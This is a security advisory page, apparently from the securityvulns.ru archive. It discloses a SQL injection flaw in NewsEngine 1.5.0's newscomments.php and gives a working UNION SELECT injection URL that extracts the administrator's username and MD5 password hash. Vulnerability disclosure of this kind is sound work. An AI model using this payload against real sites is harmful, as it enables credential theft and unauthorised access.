Computer Security

Security Advisory: ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability

  [KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection

  Dmx Forum <= v2.1a Remote Passwords Disclosure

  [MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:06.06.2006
Subject:ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Author :   ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$
http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,
username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0/**/from/**/news1_user/**/where/**/userid=1/*

Admin MD5 HaSh
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server